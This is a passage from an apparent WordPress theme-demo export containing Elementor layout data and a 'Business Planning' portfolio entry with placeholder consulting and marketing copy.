organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3f1c03c","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"14e76c1","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b71a353","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3d43e73","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"e638c2d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ee14b26","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6f412ac","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ad1cdc5","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"b8d632f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"44195aa","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"909eaed","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b4130ac","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"e9ac679","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"b5ab25d","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"66e3e67","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"866cbca","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"16980fe","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"36a5474","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ec6bc59","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"e406947","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[800]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-planning/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=802</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>June 25, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>802</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[803]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"397902fd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"26a3c89f","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5d3639ae","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"4764c788","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"c953f5b","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"6976af58","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"532be286","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1f8d8f2","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f6bdc05","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"456060bf","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1b23ea4e","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3795aac6","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7c34ff65","elType":"widget","settings":{"editor":"<p>June 25, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"426b0206","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"44248ebd","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"3832640c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"b6a26ad","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"481b7621","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"742ca4e","elType":"section","settings":[],"elements":[{"id":"aef4b65","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"c8e2d62","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7984523","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"537093c","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"eff76d8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"8904f66","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"aec2f79","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8763494","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"852e0f5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8a6abf1","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"93d2cf3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c86291a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2f8168e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7aa23d3","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9f6a839","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"feddcc3","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"9ed9abf","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f5ef4d2","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> 